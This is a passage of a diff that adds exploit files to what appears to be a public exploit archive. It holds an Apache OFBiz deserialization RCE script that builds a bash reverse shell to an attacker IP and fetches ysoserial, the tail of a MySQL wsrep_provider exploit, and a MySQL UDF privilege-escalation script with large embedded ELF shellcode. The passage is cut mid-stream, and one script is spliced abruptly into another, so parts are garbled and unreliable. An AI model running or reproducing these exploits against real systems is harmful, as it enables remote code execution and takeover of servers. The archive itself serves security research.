HRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg=="
+
+#
+# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
+#
+
+with open("ViewstateCracker.java","w") as f:
+ f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
+
+
+exploit_handler = ExploitHandler
+
+PORT = 6010
+
+exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
+
+exploit_server.serve_forever()
\ No newline at end of file
diff --git a/exploits/java/webapps/50178.sh b/exploits/java/webapps/50178.sh
new file mode 100755
index 000000000..eeb402cca
--- /dev/null
+++ b/exploits/java/webapps/50178.sh
@@ -0,0 +1,78 @@
+# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
+# Date: 2021-08-04
+# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
+# Vendor Homepage: https://ofbiz.apache.org/index.html
+# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
+# Version: 17.12.01
+# Tested on: Linux
+
+# CVE : CVE-2020-9496
+
+# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
+
+# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
+
+#!/usr/bin/env bash
+
+# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
+# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
+#
+# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
+# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
+#
+# Steps to exploit:
+#
+# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
+# Step 2: Start nc listener (Recommended 8001).
+# Step 3: Run the exploit.
+
+
+url='https://127.0.0.1' # CHANGE THIS
+port=8443 # CHANGE THIS
+
+function helpPanel(){
+ echo -e "\nUsage:"
+ echo -e "\t[-i] Attacker's IP"
+ echo -e "\t[-p] Attacker's Port"
+ echo -e "\t[-h] Show help pannel"
+ exit 1
+}
+
+
+function ctrl_c(){
+ echo -e "\n\n[!] Exiting...\n"
+ exit 1
+}
+# Ctrl + C
+trap ctrl_c INT
+
+function webRequest(){
+ echo -e "\n[*] Creating a shell file with bash\n"
+ echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
+ echo -e "[*] Downloading YsoSerial JAR File\n"
+ wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
+ echo -e "[*] Generating a JAR payload\n"
+ payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
+ echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
+ curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscovery test $payload ProjectDiscovery test $payload2 LPORT= -f elf-so -o CVE-2021-27928.so
+
+# Start a listener
+nc -lvp
+
+# Copy the payload to the target machine (In this example, SCP/SSH is used)
+scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so
+
+# Execute the payload
+mysql -u -p -h -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
\ No newline at end of file
diff --git a/exploits/linux/local/50236.py b/exploits/linux/local/50236.py
new file mode 100755
index 000000000..f548bac5c
--- /dev/null
+++ b/exploits/linux/local/50236.py
@@ -0,0 +1,116 @@
+# Exploit Title: MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)
+# Date: 29/08/2021
+# Exploit Author: ninpwn
+# Vendor Homepage: https://www.mysql.com
+# Software Link: www.mysql.com
+# Version: MySQL 4.x/5.x
+# Tested on: Debian GNU/Linux 9 / mysql Ver 14.14 Distrib 5.7.30, for Linux (x86_64) using EditLine wrapper
+# CVE : N/A
+
+'''
+*** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function Local Privilege Escalation Exploit - Python 3 Version ***
+
+
+UDF lib shellcodes retrieved from metasploit
+(there are windows .dll libraries within metasploit as well so this could be easily ported to Windows)
+
+Based on the Python 2 exploit by D7X (EDB ID: 46249) and the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518)
+CVE: N/A
+References:
+https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html
+https://www.exploit-db.com/exploits/1518
+https://www.exploit-db.com/exploits/46249
+https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith)
+
+Tested on Linux 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux
+
+@ninpwn
+https://twitter.com/ninpwn
+'''
+#!/usr/bin/python3
+
+import sys
+import subprocess
+import platform, random
+import argparse
+import os
+import re
+import pty
+
+shellcode_x32 = "7f454c4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000f80e0000f80e00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000d0000000d0000000060000000400000051e5746400000000000000000000000000000000000000000600000004000000250000002a0000001400000008000000270000001d0000000000000000000000030000000000000011000000000000000a0000002900000012000000200000000000000000000000260000000c0000002100000017000000230000000d000000000000000e0000001c000000150000000000000006000000000000000000000010000000220000000f0000002400000019000000180000000000000000000000000000000000000000000000000000001a0000000200000013000000050000000000000000000000000000000000000000000000000000001f00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000b00000000000000000000000000000000000000000000001e0000001b0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019c7c9bda4080390046083130000001500000016000000180000001a0000001c0000001f00000021000000000000002200000000000000230000002400000026000000280000002900000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe1200000000000000000000000000000000e7000000000000008d00000012000000c2000000000000005c00000012000000ba00000000000000e7040000120000000100000000000000000000002000000025000000000000000000000020000000ed000000000000007e02000012000000ab01000000000000150100001200000079010000000000007d00000012000000c700000000000000c600000012000000f50000000000000071010000120000009e01000000000000fb00000012000000cf00000000000000700000001200000010010000000000002500000012000000e0000000000000008901000012000000b500000000000000a80200001200000016000000000000000b0100002200000088010000000000007400000012000000fb00000000000000230000001200000080010000040d00006100000012000b00750000003b0a00000500000012000b0010000000f80d00000000000012000c003f010000a10c00002500000012000b001f010000100900000000000012000900c301000008110000000000001000f1ff96000000470a00000500000012000b0070010000ee0c00001600000012000b00cf01000010110000000000001000f1ff56000000310a00000500000012000b00020100009c0b00003000000012000b00a30100007d0d00003e00000012000b00390000002c0a00000500000012000b00320100006b0c00003600000012000b00bc01000008110000000000001000f1ff65000000360a00000500000012000b0025010000fc0b00006f00000012000b0085000000400a00000700000012000b0017010000cc0b00003000000012000b0055010000c60c00002800000012000b00a90000004c0a00008800000012000b008f010000650d00001800000012000b00d7000000d40a0000c800000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000474c4942435f322e310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300b20100001000000000000000731f690900000400d4010000100000001069690d00000300e0010000100000001169690d00000200ea01000000000000040b000008000000b70b000008000000e70b000008000000110c000008000000220c000008000000550c0000080000008e0c000008000000ac0c000008000000d90c00000800000004110000080000006b0a0000020f00007c0a000002030000960a000002020000ad0a000002090000430b000002090000bc0a0000020c0000e40a0000020e0000f30a0000020e00003f0c0000020e00000e0b000002010000310b000002060000560b0000020a0000680b000002120000bf0b0000020d0000ef0b0000020d00005b0c0000020d0000960c0000020d0000b20c0000020d0000e10c0000020d0000fd0c000002080000580d000002110000770d0000020b00008e0d000002070000e410000006040000e810000006050000ec10000006100000fc1000000704000000110000071000005589e55383ec04e8000000005b81c3d40700008b93f4ffffff85d27405e81e000000e8b9000000e884040000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff5589e55653e8ad00000081c37607000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8bcffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c3f706000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35531c089e55dc35589e55dc35589e557565383ec0cfc83c9ff8b750c8b46088b3831c0f2aef7d18d59ffe8fcffffff83f8007c53753f83ec0c6a1ee8fcffffff5f596a006a00486a218d1418f7d06a0721d0506a00e8fcffffff83c42083f8ff89c7742351538b4608ff3057e8fcffffffffd7eb0b526a016a0050e8fcffffff31c083c410eb05b8010000008d65f45b5e5f5dc35589e557565383ec18fc6800040000e8fcffffffc70424010000008945e8e8fcffffffc6000089c68b450c595b31db68840e00008b4008ff30e8fcffffff8945eceb338b7de831c083c9fff2ae5252f7d18d79ff8d043b50568945f0e8fcffffff83c40c57ff75e889c68d041850e8fcffffff8b5df083c40cff75ec6a04ff75e8e8fcffffff83c41085c075b683ec0cff75ece8fcffffff83c410803e0075088b4518c60001eb16c6441eff0031c083c9ff89f7f2ae8b4514f7d14989088d65f489f05b5e5f5dc35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e55383ec048b550c8b5d10833a0274095050683f0e0000eb428b420483380074095050685e0e0000eb318b520c83ec0cc74004000000008b0283c00203420450e8fcffffff8b550883c41089420c31d285c07512505068860e000053e8fcffffffb20183c41088d08b5dfcc9c35589e583ec088b450c83380175128b4004833800750a8b4508c6000131c0eb14505068140e0000ff7510e8fcffffffb00183c410c9c35589e55383ec0c8b5d1068a00e000053e8fcffffff8b4514c7001e00000089d88b5dfcc9c35531d289e583ec088b450c8338007414525268bf0e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec148b450c8b4008ff30e8fcffffffc999c35589e557565383ec10fc8b550c8b45088b580c8b420c89df8b088d440b018945e88b42088b30f3a48b420c8b00c60403008b42088b4a0c8b7de88b70048b4904f3a48b420c8b55e88b4004c60402006a015253e8fcffffff8d65f45b5e5f5d99c35589e58b45088b400c85c074098945085de9fcffffff5dc35589e55783ec10fc8b450c8b4008ff30e8fcffffff83c41085c089c275088b4518c60001eb1131c083c9ff89d7f2ae8b4514f7d149890889d08b7dfcc9c390909090905589e55653e85dfcffff81c3260300008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c3ec020000e860fbffff595bc9c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000b20100000c000000100900000d000000f80d000004000000b4000000f5feff6ff8010000050000005805000006000000b80200000a000000f40100000b0000001000000003000000f010000002000000100000001400000011000000170000000009000011000000e0070000120000002001000013000000080000001600000000000000feffff6fa0070000ffffff6f01000000f0ffff6f4c070000faffff6f0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000141000000000000000000000560900006609000004110000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000b4000000b400000044010000030000000000000004000000040000000b000000f6ffff6f02000000f8010000f8010000c000000003000000000000000400000004000000150000000b00000002000000b8020000b8020000a0020000040000000100000004000000100000001d00000003000000020000005805000058050000f40100000000000000000000010000000000000025000000ffffff6f020000004c0700004c070000540000000300000000000000020000000200000032000000feffff6f02000000a0070000a00700004000000004000000010000000400000000000000410000000900000002000000e0070000e007000020010000030000000000000004000000080000004a0000000900000002000000000900000009000010000000030000000a0000000400000008000000530000000100000006000000100900001009000030000000000000000000000004000000000000004e000000010000000600000040090000400900003000000000000000000000000400000004000000590000000100000006000000700900007009000088040000000000000000000010000000000000005f0000000100000006000000f80d0000f80d00001c00000000000000000000000400000000000000650000000100000032000000140e0000140e0000dd000000000000000000000001000000010000006d0000000100000002000000f40e0000f40e00000400000000000000000000000400000000000000770000000100000003000000001000000010000008000000000000000000000004000000000000007e000000010000000300000008100000081000000800000000000000000000000400000000000000850000000100000003000000101000001010000004000000000000000000000004000000000000008a00000006000000030000001410000014100000d000000004000000000000000400000008000000930000000100000003000000e4100000e41000000c00000000000000000000000400000004000000980000000100000003000000f0100000f01000001400000000000000000000000400000004000000a1000000010000000300000004110000041100000400000000000000000000000400000000000000a7000000080000000300000008110000081100000800000000000000000000000400000000000000ac000000010000000000000000000000081100009b0000000000000000000000010000000000000001000000030000000000000000000000a3110000b500000000000000000000000100000000000000";
+shellcode_x64 = "7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e816000000000000980000000000000000000000000000000800000000000000